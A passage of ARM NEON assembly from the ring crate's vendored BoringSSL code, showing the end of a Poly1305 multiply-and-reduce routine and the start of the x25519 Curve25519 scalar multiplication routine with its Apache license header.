._end:
# qhasm: mem128[input_0] = x01;input_0+=16
# asm 1: vst1.8 {<x01=reg128#9%bot-<x01=reg128#9%top},[<input_0=int32#1]!
# asm 2: vst1.8 {<x01=d16-<x01=d17},[<input_0=r0]!
vst1.8 {d16-d17},[r0]!
# qhasm: mem128[input_0] = x23;input_0+=16
# asm 1: vst1.8 {<x23=reg128#10%bot-<x23=reg128#10%top},[<input_0=int32#1]!
# asm 2: vst1.8 {<x23=d18-<x23=d19},[<input_0=r0]!
vst1.8 {d18-d19},[r0]!
# qhasm: mem64[input_0] = x4[0]
# asm 1: vst1.8 <x4=reg128#11%bot,[<input_0=int32#1]
# asm 2: vst1.8 <x4=d20,[<input_0=r0]
vst1.8 d20,[r0]
# qhasm: len = len
# asm 1: mov >len=int32#1,<len=int32#4
# asm 2: mov >len=r0,<len=r3
mov r0,r3
# qhasm: qpopreturn len
mov sp,r12
vpop {q4,q5,q6,q7}
bx lr
# qhasm: int32 input_0
# qhasm: int32 input_1
# qhasm: int32 input_2
# qhasm: int32 input_3
# qhasm: stack32 input_4
# qhasm: stack32 input_5
# qhasm: stack32 input_6
# qhasm: stack32 input_7
# qhasm: int32 caller_r4
# qhasm: int32 caller_r5
# qhasm: int32 caller_r6
# qhasm: int32 caller_r7
# qhasm: int32 caller_r8
# qhasm: int32 caller_r9
# qhasm: int32 caller_r10
# qhasm: int32 caller_r11
# qhasm: int32 caller_r12
# qhasm: int32 caller_r14
# qhasm: reg128 caller_q4
# qhasm: reg128 caller_q5
# qhasm: reg128 caller_q6
# qhasm: reg128 caller_q7
# qhasm: reg128 r0
# qhasm: reg128 r1
# qhasm: reg128 r2
# qhasm: reg128 r3
# qhasm: reg128 r4
# qhasm: reg128 x01
# qhasm: reg128 x23
# qhasm: reg128 x4
# qhasm: reg128 y01
# qhasm: reg128 y23
# qhasm: reg128 y4
# qhasm: reg128 _5y01
# qhasm: reg128 _5y23
# qhasm: reg128 _5y4
# qhasm: reg128 c01
# qhasm: reg128 c23
# qhasm: reg128 c4
# qhasm: reg128 t0
# qhasm: reg128 t1
# qhasm: reg128 t2
# qhasm: reg128 t3
# qhasm: reg128 t4
# qhasm: reg128 mask
# qhasm: enter crypto_onetimeauth_poly1305_neon2_addmulmod
.align 2
.global openssl_poly1305_neon2_addmulmod
.hidden openssl_poly1305_neon2_addmulmod
.type openssl_poly1305_neon2_addmulmod STT_FUNC
openssl_poly1305_neon2_addmulmod:
sub sp,sp,#0
# qhasm: 2x mask = 0xffffffff
# asm 1: vmov.i64 >mask=reg128#1,#0xffffffff
# asm 2: vmov.i64 >mask=q0,#0xffffffff
vmov.i64 q0,#0xffffffff
# qhasm: y01 aligned= mem128[input_2];input_2+=16
# asm 1: vld1.8 {>y01=reg128#2%bot->y01=reg128#2%top},[<input_2=int32#3,: 128]!
# asm 2: vld1.8 {>y01=d2->y01=d3},[<input_2=r2,: 128]!
vld1.8 {d2-d3},[r2,: 128]!
# qhasm: 4x _5y01 = y01 << 2
# asm 1: vshl.i32 >_5y01=reg128#3,<y01=reg128#2,#2
# asm 2: vshl.i32 >_5y01=q2,<y01=q1,#2
vshl.i32 q2,q1,#2
# qhasm: y23 aligned= mem128[input_2];input_2+=16
# asm 1: vld1.8 {>y23=reg128#4%bot->y23=reg128#4%top},[<input_2=int32#3,: 128]!
# asm 2: vld1.8 {>y23=d6->y23=d7},[<input_2=r2,: 128]!
vld1.8 {d6-d7},[r2,: 128]!
# qhasm: 4x _5y23 = y23 << 2
# asm 1: vshl.i32 >_5y23=reg128#9,<y23=reg128#4,#2
# asm 2: vshl.i32 >_5y23=q8,<y23=q3,#2
vshl.i32 q8,q3,#2
# qhasm: y4 aligned= mem64[input_2]y4[1]
# asm 1: vld1.8 {<y4=reg128#10%bot},[<input_2=int32#3,: 64]
# asm 2: vld1.8 {<y4=d18},[<input_2=r2,: 64]
vld1.8 {d18},[r2,: 64]
# qhasm: 4x _5y4 = y4 << 2
# asm 1: vshl.i32 >_5y4=reg128#11,<y4=reg128#10,#2
# asm 2: vshl.i32 >_5y4=q10,<y4=q9,#2
vshl.i32 q10,q9,#2
# qhasm: x01 aligned= mem128[input_1];input_1+=16
# asm 1: vld1.8 {>x01=reg128#12%bot->x01=reg128#12%top},[<input_1=int32#2,: 128]!
# asm 2: vld1.8 {>x01=d22->x01=d23},[<input_1=r1,: 128]!
vld1.8 {d22-d23},[r1,: 128]!
# qhasm: 4x _5y01 += y01
# asm 1: vadd.i32 >_5y01=reg128#3,<_5y01=reg128#3,<y01=reg128#2
# asm 2: vadd.i32 >_5y01=q2,<_5y01=q2,<y01=q1
vadd.i32 q2,q2,q1
# qhasm: x23 aligned= mem128[input_1];input_1+=16
# asm 1: vld1.8 {>x23=reg128#13%bot->x23=reg128#13%top},[<input_1=int32#2,: 128]!
# asm 2: vld1.8 {>x23=d24->x23=d25},[<input_1=r1,: 128]!
vld1.8 {d24-d25},[r1,: 128]!
# qhasm: 4x _5y23 += y23
# asm 1: vadd.i32 >_5y23=reg128#9,<_5y23=reg128#9,<y23=reg128#4
# asm 2: vadd.i32 >_5y23=q8,<_5y23=q8,<y23=q3
vadd.i32 q8,q8,q3
# qhasm: 4x _5y4 += y4
# asm 1: vadd.i32 >_5y4=reg128#11,<_5y4=reg128#11,<y4=reg128#10
# asm 2: vadd.i32 >_5y4=q10,<_5y4=q10,<y4=q9
vadd.i32 q10,q10,q9
# qhasm: c01 aligned= mem128[input_3];input_3+=16
# asm 1: vld1.8 {>c01=reg128#14%bot->c01=reg128#14%top},[<input_3=int32#4,: 128]!
# asm 2: vld1.8 {>c01=d26->c01=d27},[<input_3=r3,: 128]!
vld1.8 {d26-d27},[r3,: 128]!
# qhasm: 4x x01 += c01
# asm 1: vadd.i32 >x01=reg128#12,<x01=reg128#12,<c01=reg128#14
# asm 2: vadd.i32 >x01=q11,<x01=q11,<c01=q13
vadd.i32 q11,q11,q13
# qhasm: c23 aligned= mem128[input_3];input_3+=16
# asm 1: vld1.8 {>c23=reg128#14%bot->c23=reg128#14%top},[<input_3=int32#4,: 128]!
# asm 2: vld1.8 {>c23=d26->c23=d27},[<input_3=r3,: 128]!
vld1.8 {d26-d27},[r3,: 128]!
# qhasm: 4x x23 += c23
# asm 1: vadd.i32 >x23=reg128#13,<x23=reg128#13,<c23=reg128#14
# asm 2: vadd.i32 >x23=q12,<x23=q12,<c23=q13
vadd.i32 q12,q12,q13
# qhasm: x4 aligned= mem64[input_1]x4[1]
# asm 1: vld1.8 {<x4=reg128#14%bot},[<input_1=int32#2,: 64]
# asm 2: vld1.8 {<x4=d26},[<input_1=r1,: 64]
vld1.8 {d26},[r1,: 64]
# qhasm: 2x mask unsigned>>=6
# asm 1: vshr.u64 >mask=reg128#1,<mask=reg128#1,#6
# asm 2: vshr.u64 >mask=q0,<mask=q0,#6
vshr.u64 q0,q0,#6
# qhasm: c4 aligned= mem64[input_3]c4[1]
# asm 1: vld1.8 {<c4=reg128#15%bot},[<input_3=int32#4,: 64]
# asm 2: vld1.8 {<c4=d28},[<input_3=r3,: 64]
vld1.8 {d28},[r3,: 64]
# qhasm: 4x x4 += c4
# asm 1: vadd.i32 >x4=reg128#14,<x4=reg128#14,<c4=reg128#15
# asm 2: vadd.i32 >x4=q13,<x4=q13,<c4=q14
vadd.i32 q13,q13,q14
# qhasm: r0[0,1] = x01[0] unsigned* y01[0]; r0[2,3] = x01[1] unsigned* y01[1]
# asm 1: vmull.u32 >r0=reg128#15,<x01=reg128#12%bot,<y01=reg128#2%bot
# asm 2: vmull.u32 >r0=q14,<x01=d22,<y01=d2
vmull.u32 q14,d22,d2
# qhasm: r0[0,1] += x01[2] unsigned* _5y4[0]; r0[2,3] += x01[3] unsigned* _5y4[1]
# asm 1: vmlal.u32 <r0=reg128#15,<x01=reg128#12%top,<_5y4=reg128#11%bot
# asm 2: vmlal.u32 <r0=q14,<x01=d23,<_5y4=d20
vmlal.u32 q14,d23,d20
# qhasm: r0[0,1] += x23[0] unsigned* _5y23[2]; r0[2,3] += x23[1] unsigned* _5y23[3]
# asm 1: vmlal.u32 <r0=reg128#15,<x23=reg128#13%bot,<_5y23=reg128#9%top
# asm 2: vmlal.u32 <r0=q14,<x23=d24,<_5y23=d17
vmlal.u32 q14,d24,d17
# qhasm: r0[0,1] += x23[2] unsigned* _5y23[0]; r0[2,3] += x23[3] unsigned* _5y23[1]
# asm 1: vmlal.u32 <r0=reg128#15,<x23=reg128#13%top,<_5y23=reg128#9%bot
# asm 2: vmlal.u32 <r0=q14,<x23=d25,<_5y23=d16
vmlal.u32 q14,d25,d16
# qhasm: r0[0,1] += x4[0] unsigned* _5y01[2]; r0[2,3] += x4[1] unsigned* _5y01[3]
# asm 1: vmlal.u32 <r0=reg128#15,<x4=reg128#14%bot,<_5y01=reg128#3%top
# asm 2: vmlal.u32 <r0=q14,<x4=d26,<_5y01=d5
vmlal.u32 q14,d26,d5
# qhasm: r1[0,1] = x01[0] unsigned* y01[2]; r1[2,3] = x01[1] unsigned* y01[3]
# asm 1: vmull.u32 >r1=reg128#3,<x01=reg128#12%bot,<y01=reg128#2%top
# asm 2: vmull.u32 >r1=q2,<x01=d22,<y01=d3
vmull.u32 q2,d22,d3
# qhasm: r1[0,1] += x01[2] unsigned* y01[0]; r1[2,3] += x01[3] unsigned* y01[1]
# asm 1: vmlal.u32 <r1=reg128#3,<x01=reg128#12%top,<y01=reg128#2%bot
# asm 2: vmlal.u32 <r1=q2,<x01=d23,<y01=d2
vmlal.u32 q2,d23,d2
# qhasm: r1[0,1] += x23[0] unsigned* _5y4[0]; r1[2,3] += x23[1] unsigned* _5y4[1]
# asm 1: vmlal.u32 <r1=reg128#3,<x23=reg128#13%bot,<_5y4=reg128#11%bot
# asm 2: vmlal.u32 <r1=q2,<x23=d24,<_5y4=d20
vmlal.u32 q2,d24,d20
# qhasm: r1[0,1] += x23[2] unsigned* _5y23[2]; r1[2,3] += x23[3] unsigned* _5y23[3]
# asm 1: vmlal.u32 <r1=reg128#3,<x23=reg128#13%top,<_5y23=reg128#9%top
# asm 2: vmlal.u32 <r1=q2,<x23=d25,<_5y23=d17
vmlal.u32 q2,d25,d17
# qhasm: r1[0,1] += x4[0] unsigned* _5y23[0]; r1[2,3] += x4[1] unsigned* _5y23[1]
# asm 1: vmlal.u32 <r1=reg128#3,<x4=reg128#14%bot,<_5y23=reg128#9%bot
# asm 2: vmlal.u32 <r1=q2,<x4=d26,<_5y23=d16
vmlal.u32 q2,d26,d16
# qhasm: r2[0,1] = x01[0] unsigned* y23[0]; r2[2,3] = x01[1] unsigned* y23[1]
# asm 1: vmull.u32 >r2=reg128#16,<x01=reg128#12%bot,<y23=reg128#4%bot
# asm 2: vmull.u32 >r2=q15,<x01=d22,<y23=d6
vmull.u32 q15,d22,d6
# qhasm: r2[0,1] += x01[2] unsigned* y01[2]; r2[2,3] += x01[3] unsigned* y01[3]
# asm 1: vmlal.u32 <r2=reg128#16,<x01=reg128#12%top,<y01=reg128#2%top
# asm 2: vmlal.u32 <r2=q15,<x01=d23,<y01=d3
vmlal.u32 q15,d23,d3
# qhasm: r2[0,1] += x23[0] unsigned* y01[0]; r2[2,3] += x23[1] unsigned* y01[1]
# asm 1: vmlal.u32 <r2=reg128#16,<x23=reg128#13%bot,<y01=reg128#2%bot
# asm 2: vmlal.u32 <r2=q15,<x23=d24,<y01=d2
vmlal.u32 q15,d24,d2
# qhasm: r2[0,1] += x23[2] unsigned* _5y4[0]; r2[2,3] += x23[3] unsigned* _5y4[1]
# asm 1: vmlal.u32 <r2=reg128#16,<x23=reg128#13%top,<_5y4=reg128#11%bot
# asm 2: vmlal.u32 <r2=q15,<x23=d25,<_5y4=d20
vmlal.u32 q15,d25,d20
# qhasm: r2[0,1] += x4[0] unsigned* _5y23[2]; r2[2,3] += x4[1] unsigned* _5y23[3]
# asm 1: vmlal.u32 <r2=reg128#16,<x4=reg128#14%bot,<_5y23=reg128#9%top
# asm 2: vmlal.u32 <r2=q15,<x4=d26,<_5y23=d17
vmlal.u32 q15,d26,d17
# qhasm: r3[0,1] = x01[0] unsigned* y23[2]; r3[2,3] = x01[1] unsigned* y23[3]
# asm 1: vmull.u32 >r3=reg128#9,<x01=reg128#12%bot,<y23=reg128#4%top
# asm 2: vmull.u32 >r3=q8,<x01=d22,<y23=d7
vmull.u32 q8,d22,d7
# qhasm: r3[0,1] += x01[2] unsigned* y23[0]; r3[2,3] += x01[3] unsigned* y23[1]
# asm 1: vmlal.u32 <r3=reg128#9,<x01=reg128#12%top,<y23=reg128#4%bot
# asm 2: vmlal.u32 <r3=q8,<x01=d23,<y23=d6
vmlal.u32 q8,d23,d6
# qhasm: r3[0,1] += x23[0] unsigned* y01[2]; r3[2,3] += x23[1] unsigned* y01[3]
# asm 1: vmlal.u32 <r3=reg128#9,<x23=reg128#13%bot,<y01=reg128#2%top
# asm 2: vmlal.u32 <r3=q8,<x23=d24,<y01=d3
vmlal.u32 q8,d24,d3
# qhasm: r3[0,1] += x23[2] unsigned* y01[0]; r3[2,3] += x23[3] unsigned* y01[1]
# asm 1: vmlal.u32 <r3=reg128#9,<x23=reg128#13%top,<y01=reg128#2%bot
# asm 2: vmlal.u32 <r3=q8,<x23=d25,<y01=d2
vmlal.u32 q8,d25,d2
# qhasm: r3[0,1] += x4[0] unsigned* _5y4[0]; r3[2,3] += x4[1] unsigned* _5y4[1]
# asm 1: vmlal.u32 <r3=reg128#9,<x4=reg128#14%bot,<_5y4=reg128#11%bot
# asm 2: vmlal.u32 <r3=q8,<x4=d26,<_5y4=d20
vmlal.u32 q8,d26,d20
# qhasm: r4[0,1] = x01[0] unsigned* y4[0]; r4[2,3] = x01[1] unsigned* y4[1]
# asm 1: vmull.u32 >r4=reg128#10,<x01=reg128#12%bot,<y4=reg128#10%bot
# asm 2: vmull.u32 >r4=q9,<x01=d22,<y4=d18
vmull.u32 q9,d22,d18
# qhasm: r4[0,1] += x01[2] unsigned* y23[2]; r4[2,3] += x01[3] unsigned* y23[3]
# asm 1: vmlal.u32 <r4=reg128#10,<x01=reg128#12%top,<y23=reg128#4%top
# asm 2: vmlal.u32 <r4=q9,<x01=d23,<y23=d7
vmlal.u32 q9,d23,d7
# qhasm: r4[0,1] += x23[0] unsigned* y23[0]; r4[2,3] += x23[1] unsigned* y23[1]
# asm 1: vmlal.u32 <r4=reg128#10,<x23=reg128#13%bot,<y23=reg128#4%bot
# asm 2: vmlal.u32 <r4=q9,<x23=d24,<y23=d6
vmlal.u32 q9,d24,d6
# qhasm: r4[0,1] += x23[2] unsigned* y01[2]; r4[2,3] += x23[3] unsigned* y01[3]
# asm 1: vmlal.u32 <r4=reg128#10,<x23=reg128#13%top,<y01=reg128#2%top
# asm 2: vmlal.u32 <r4=q9,<x23=d25,<y01=d3
vmlal.u32 q9,d25,d3
# qhasm: r4[0,1] += x4[0] unsigned* y01[0]; r4[2,3] += x4[1] unsigned* y01[1]
# asm 1: vmlal.u32 <r4=reg128#10,<x4=reg128#14%bot,<y01=reg128#2%bot
# asm 2: vmlal.u32 <r4=q9,<x4=d26,<y01=d2
vmlal.u32 q9,d26,d2
# qhasm: 2x t1 = r0 unsigned>> 26
# asm 1: vshr.u64 >t1=reg128#2,<r0=reg128#15,#26
# asm 2: vshr.u64 >t1=q1,<r0=q14,#26
vshr.u64 q1,q14,#26
# qhasm: r0 &= mask
# asm 1: vand >r0=reg128#4,<r0=reg128#15,<mask=reg128#1
# asm 2: vand >r0=q3,<r0=q14,<mask=q0
vand q3,q14,q0
# qhasm: 2x r1 += t1
# asm 1: vadd.i64 >r1=reg128#2,<r1=reg128#3,<t1=reg128#2
# asm 2: vadd.i64 >r1=q1,<r1=q2,<t1=q1
vadd.i64 q1,q2,q1
# qhasm: 2x t4 = r3 unsigned>> 26
# asm 1: vshr.u64 >t4=reg128#3,<r3=reg128#9,#26
# asm 2: vshr.u64 >t4=q2,<r3=q8,#26
vshr.u64 q2,q8,#26
# qhasm: r3 &= mask
# asm 1: vand >r3=reg128#9,<r3=reg128#9,<mask=reg128#1
# asm 2: vand >r3=q8,<r3=q8,<mask=q0
vand q8,q8,q0
# qhasm: 2x r4 += t4
# asm 1: vadd.i64 >r4=reg128#3,<r4=reg128#10,<t4=reg128#3
# asm 2: vadd.i64 >r4=q2,<r4=q9,<t4=q2
vadd.i64 q2,q9,q2
# qhasm: 2x t2 = r1 unsigned>> 26
# asm 1: vshr.u64 >t2=reg128#10,<r1=reg128#2,#26
# asm 2: vshr.u64 >t2=q9,<r1=q1,#26
vshr.u64 q9,q1,#26
# qhasm: r1 &= mask
# asm 1: vand >r1=reg128#2,<r1=reg128#2,<mask=reg128#1
# asm 2: vand >r1=q1,<r1=q1,<mask=q0
vand q1,q1,q0
# qhasm: 2x t0 = r4 unsigned>> 26
# asm 1: vshr.u64 >t0=reg128#11,<r4=reg128#3,#26
# asm 2: vshr.u64 >t0=q10,<r4=q2,#26
vshr.u64 q10,q2,#26
# qhasm: 2x r2 += t2
# asm 1: vadd.i64 >r2=reg128#10,<r2=reg128#16,<t2=reg128#10
# asm 2: vadd.i64 >r2=q9,<r2=q15,<t2=q9
vadd.i64 q9,q15,q9
# qhasm: r4 &= mask
# asm 1: vand >r4=reg128#3,<r4=reg128#3,<mask=reg128#1
# asm 2: vand >r4=q2,<r4=q2,<mask=q0
vand q2,q2,q0
# qhasm: 2x r0 += t0
# asm 1: vadd.i64 >r0=reg128#4,<r0=reg128#4,<t0=reg128#11
# asm 2: vadd.i64 >r0=q3,<r0=q3,<t0=q10
vadd.i64 q3,q3,q10
# qhasm: 2x t0 <<= 2
# asm 1: vshl.i64 >t0=reg128#11,<t0=reg128#11,#2
# asm 2: vshl.i64 >t0=q10,<t0=q10,#2
vshl.i64 q10,q10,#2
# qhasm: 2x t3 = r2 unsigned>> 26
# asm 1: vshr.u64 >t3=reg128#12,<r2=reg128#10,#26
# asm 2: vshr.u64 >t3=q11,<r2=q9,#26
vshr.u64 q11,q9,#26
# qhasm: 2x r0 += t0
# asm 1: vadd.i64 >r0=reg128#4,<r0=reg128#4,<t0=reg128#11
# asm 2: vadd.i64 >r0=q3,<r0=q3,<t0=q10
vadd.i64 q3,q3,q10
# qhasm: x23 = r2 & mask
# asm 1: vand >x23=reg128#10,<r2=reg128#10,<mask=reg128#1
# asm 2: vand >x23=q9,<r2=q9,<mask=q0
vand q9,q9,q0
# qhasm: 2x r3 += t3
# asm 1: vadd.i64 >r3=reg128#9,<r3=reg128#9,<t3=reg128#12
# asm 2: vadd.i64 >r3=q8,<r3=q8,<t3=q11
vadd.i64 q8,q8,q11
# qhasm: 2x t1 = r0 unsigned>> 26
# asm 1: vshr.u64 >t1=reg128#11,<r0=reg128#4,#26
# asm 2: vshr.u64 >t1=q10,<r0=q3,#26
vshr.u64 q10,q3,#26
# qhasm: x23 = x23[0,2,1,3]
# asm 1: vtrn.32 <x23=reg128#10%bot,<x23=reg128#10%top
# asm 2: vtrn.32 <x23=d18,<x23=d19
vtrn.32 d18,d19
# qhasm: x01 = r0 & mask
# asm 1: vand >x01=reg128#4,<r0=reg128#4,<mask=reg128#1
# asm 2: vand >x01=q3,<r0=q3,<mask=q0
vand q3,q3,q0
# qhasm: 2x r1 += t1
# asm 1: vadd.i64 >r1=reg128#2,<r1=reg128#2,<t1=reg128#11
# asm 2: vadd.i64 >r1=q1,<r1=q1,<t1=q10
vadd.i64 q1,q1,q10
# qhasm: 2x t4 = r3 unsigned>> 26
# asm 1: vshr.u64 >t4=reg128#11,<r3=reg128#9,#26
# asm 2: vshr.u64 >t4=q10,<r3=q8,#26
vshr.u64 q10,q8,#26
# qhasm: x01 = x01[0,2,1,3]
# asm 1: vtrn.32 <x01=reg128#4%bot,<x01=reg128#4%top
# asm 2: vtrn.32 <x01=d6,<x01=d7
vtrn.32 d6,d7
# qhasm: r3 &= mask
# asm 1: vand >r3=reg128#1,<r3=reg128#9,<mask=reg128#1
# asm 2: vand >r3=q0,<r3=q8,<mask=q0
vand q0,q8,q0
# qhasm: r1 = r1[0,2,1,3]
# asm 1: vtrn.32 <r1=reg128#2%bot,<r1=reg128#2%top
# asm 2: vtrn.32 <r1=d2,<r1=d3
vtrn.32 d2,d3
# qhasm: 2x x4 = r4 + t4
# asm 1: vadd.i64 >x4=reg128#3,<r4=reg128#3,<t4=reg128#11
# asm 2: vadd.i64 >x4=q2,<r4=q2,<t4=q10
vadd.i64 q2,q2,q10
# qhasm: r3 = r3[0,2,1,3]
# asm 1: vtrn.32 <r3=reg128#1%bot,<r3=reg128#1%top
# asm 2: vtrn.32 <r3=d0,<r3=d1
vtrn.32 d0,d1
# qhasm: x01 = x01[0,1] r1[0,1]
# asm 1: vext.32 <x01=reg128#4%top,<r1=reg128#2%bot,<r1=reg128#2%bot,#0
# asm 2: vext.32 <x01=d7,<r1=d2,<r1=d2,#0
vext.32 d7,d2,d2,#0
# qhasm: x23 = x23[0,1] r3[0,1]
# asm 1: vext.32 <x23=reg128#10%top,<r3=reg128#1%bot,<r3=reg128#1%bot,#0
# asm 2: vext.32 <x23=d19,<r3=d0,<r3=d0,#0
vext.32 d19,d0,d0,#0
# qhasm: x4 = x4[0,2,1,3]
# asm 1: vtrn.32 <x4=reg128#3%bot,<x4=reg128#3%top
# asm 2: vtrn.32 <x4=d4,<x4=d5
vtrn.32 d4,d5
# qhasm: mem128[input_0] aligned= x01;input_0+=16
# asm 1: vst1.8 {<x01=reg128#4%bot-<x01=reg128#4%top},[<input_0=int32#1,: 128]!
# asm 2: vst1.8 {<x01=d6-<x01=d7},[<input_0=r0,: 128]!
vst1.8 {d6-d7},[r0,: 128]!
# qhasm: mem128[input_0] aligned= x23;input_0+=16
# asm 1: vst1.8 {<x23=reg128#10%bot-<x23=reg128#10%top},[<input_0=int32#1,: 128]!
# asm 2: vst1.8 {<x23=d18-<x23=d19},[<input_0=r0,: 128]!
vst1.8 {d18-d19},[r0,: 128]!
# qhasm: mem64[input_0] aligned= x4[0]
# asm 1: vst1.8 <x4=reg128#3%bot,[<input_0=int32#1,: 64]
# asm 2: vst1.8 <x4=d4,[<input_0=r0,: 64]
vst1.8 d4,[r0,: 64]
# qhasm: return
add sp,sp,#0
bx lr
#endif /* !OPENSSL_NO_ASM && OPENSSL_ARM && __ELF__ */
|
mi2bjss/Pressel-site | 41,448 | .cargo/registry/src/index.crates.io-6f17d22bba15001f/ring-0.17.13/crypto/curve25519/asm/x25519-asm-arm.S | // Copyright 2015 The BoringSSL Authors
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// https://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
/* This file is taken from crypto_scalarmult/curve25519/neon2/scalarmult.s in
* SUPERCOP 20141124 (http://bench.cr.yp.to/supercop.html). That code is public
* domain licensed but the standard Apache 2.0 license is included above to keep
* licensing simple. */
#include <ring-core/asm_base.h>
#if !defined(OPENSSL_NO_ASM) && defined(OPENSSL_ARM) && defined(__ELF__)
.fpu neon
.text
.align 4
.global x25519_NEON
.hidden x25519_NEON
.type x25519_NEON, %function
x25519_NEON:
vpush {q4,q5,q6,q7}
mov r12,sp
sub sp,sp,#736
and sp,sp,#0xffffffe0
strd r4,[sp,#0]
strd r6,[sp,#8]
strd r8,[sp,#16]
strd r10,[sp,#24]
str r12,[sp,#480]
str r14,[sp,#484]
mov r0,r0
mov r1,r1
mov r2,r2
add r3,sp,#32
ldr r4,=0
ldr r5,=254
vmov.i32 q0,#1
vshr.u64 q1,q0,#7
vshr.u64 q0,q0,#8
vmov.i32 d4,#19
vmov.i32 d5,#38
add r6,sp,#512
vst1.8 {d2-d3},[r6,: 128]
add r6,sp,#528
vst1.8 {d0-d1},[r6,: 128]
add r6,sp,#544
vst1.8 {d4-d5},[r6,: 128]
add r6,r3,#0
vmov.i32 q2,#0
vst1.8 {d4-d5},[r6,: 128]!
vst1.8 {d4-d5},[r6,: 128]!
vst1.8 d4,[r6,: 64]
add r6,r3,#0
ldr r7,=960
sub r7,r7,#2
neg r7,r7
sub r7,r7,r7,LSL #7
str r7,[r6]
add r6,sp,#704
vld1.8 {d4-d5},[r1]!
vld1.8 {d6-d7},[r1]
vst1.8 {d4-d5},[r6,: 128]!
vst1.8 {d6-d7},[r6,: 128]
sub r1,r6,#16
ldrb r6,[r1]
and r6,r6,#248
strb r6,[r1]
ldrb r6,[r1,#31]
and r6,r6,#127
orr r6,r6,#64
strb r6,[r1,#31]
vmov.i64 q2,#0xffffffff
vshr.u64 q3,q2,#7
vshr.u64 q2,q2,#6
vld1.8 {d8},[r2]
vld1.8 {d10},[r2]
add r2,r2,#6
vld1.8 {d12},[r2]
vld1.8 {d14},[r2]
add r2,r2,#6
vld1.8 {d16},[r2]
add r2,r2,#4
vld1.8 {d18},[r2]
vld1.8 {d20},[r2]
add r2,r2,#6
vld1.8 {d22},[r2]
add r2,r2,#2
vld1.8 {d24},[r2]
vld1.8 {d26},[r2]
vshr.u64 q5,q5,#26
vshr.u64 q6,q6,#3
vshr.u64 q7,q7,#29
vshr.u64 q8,q8,#6
vshr.u64 q10,q10,#25
vshr.u64 q11,q11,#3
vshr.u64 q12,q12,#12
vshr.u64 q13,q13,#38
vand q4,q4,q2
vand q6,q6,q2
vand q8,q8,q2
vand q10,q10,q2
vand q2,q12,q2
vand q5,q5,q3
vand q7,q7,q3
vand q9,q9,q3
vand q11,q11,q3
vand q3,q13,q3
add r2,r3,#48
vadd.i64 q12,q4,q1
vadd.i64 q13,q10,q1
vshr.s64 q12,q12,#26
vshr.s64 q13,q13,#26
vadd.i64 q5,q5,q12
vshl.i64 q12,q12,#26
vadd.i64 q14,q5,q0
vadd.i64 q11,q11,q13
vshl.i64 q13,q13,#26
vadd.i64 q15,q11,q0
vsub.i64 q4,q4,q12
vshr.s64 q12,q14,#25
vsub.i64 q10,q10,q13
vshr.s64 q13,q15,#25
vadd.i64 q6,q6,q12
vshl.i64 q12,q12,#25
vadd.i64 q14,q6,q1
vadd.i64 q2,q2,q13
vsub.i64 q5,q5,q12
vshr.s64 q12,q14,#26
vshl.i64 q13,q13,#25
vadd.i64 q14,q2,q1
vadd.i64 q7,q7,q12
vshl.i64 q12,q12,#26
vadd.i64 q15,q7,q0
vsub.i64 q11,q11,q13
vshr.s64 q13,q14,#26
vsub.i64 q6,q6,q12
vshr.s64 q12,q15,#25
vadd.i64 q3,q3,q13
vshl.i64 q13,q13,#26
vadd.i64 q14,q3,q0
vadd.i64 q8,q8,q12
vshl.i64 q12,q12,#25
vadd.i64 q15,q8,q1
add r2,r2,#8
vsub.i64 q2,q2,q13
vshr.s64 q13,q14,#25
vsub.i64 q7,q7,q12
vshr.s64 q12,q15,#26
vadd.i64 q14,q13,q13
vadd.i64 q9,q9,q12
vtrn.32 d12,d14
vshl.i64 q12,q12,#26
vtrn.32 d13,d15
vadd.i64 q0,q9,q0
vadd.i64 q4,q4,q14
vst1.8 d12,[r2,: 64]!
vshl.i64 q6,q13,#4
vsub.i64 q7,q8,q12
vshr.s64 q0,q0,#25
vadd.i64 q4,q4,q6
vadd.i64 q6,q10,q0
vshl.i64 q0,q0,#25
vadd.i64 q8,q6,q1
vadd.i64 q4,q4,q13
vshl.i64 q10,q13,#25
vadd.i64 q1,q4,q1
vsub.i64 q0,q9,q0
vshr.s64 q8,q8,#26
vsub.i64 q3,q3,q10
vtrn.32 d14,d0
vshr.s64 q1,q1,#26
vtrn.32 d15,d1
vadd.i64 q0,q11,q8
vst1.8 d14,[r2,: 64]
vshl.i64 q7,q8,#26
vadd.i64 q5,q5,q1
vtrn.32 d4,d6
vshl.i64 q1,q1,#26
vtrn.32 d5,d7
vsub.i64 q3,q6,q7
add r2,r2,#16
vsub.i64 q1,q4,q1
vst1.8 d4,[r2,: 64]
vtrn.32 d6,d0
vtrn.32 d7,d1
sub r2,r2,#8
vtrn.32 d2,d10
vtrn.32 d3,d11
vst1.8 d6,[r2,: 64]
sub r2,r2,#24
vst1.8 d2,[r2,: 64]
add r2,r3,#96
vmov.i32 q0,#0
vmov.i64 d2,#0xff
vmov.i64 d3,#0
vshr.u32 q1,q1,#7
vst1.8 {d2-d3},[r2,: 128]!
vst1.8 {d0-d1},[r2,: 128]!
vst1.8 d0,[r2,: 64]
add r2,r3,#144
vmov.i32 q0,#0
vst1.8 {d0-d1},[r2,: 128]!
vst1.8 {d0-d1},[r2,: 128]!
vst1.8 d0,[r2,: 64]
add r2,r3,#240
vmov.i32 q0,#0
vmov.i64 d2,#0xff
vmov.i64 d3,#0
vshr.u32 q1,q1,#7
vst1.8 {d2-d3},[r2,: 128]!
vst1.8 {d0-d1},[r2,: 128]!
vst1.8 d0,[r2,: 64]
add r2,r3,#48
add r6,r3,#192
vld1.8 {d0-d1},[r2,: 128]!
vld1.8 {d2-d3},[r2,: 128]!
vld1.8 {d4},[r2,: 64]
vst1.8 {d0-d1},[r6,: 128]!
vst1.8 {d2-d3},[r6,: 128]!
vst1.8 d4,[r6,: 64]
._mainloop:
mov r2,r5,LSR #3
and r6,r5,#7
ldrb r2,[r1,r2]
mov r2,r2,LSR r6
and r2,r2,#1
str r5,[sp,#488]
eor r4,r4,r2
str r2,[sp,#492]
neg r2,r4
add r4,r3,#96
add r5,r3,#192
add r6,r3,#144
vld1.8 {d8-d9},[r4,: 128]!
add r7,r3,#240
vld1.8 {d10-d11},[r5,: 128]!
veor q6,q4,q5
vld1.8 {d14-d15},[r6,: 128]!
vdup.i32 q8,r2
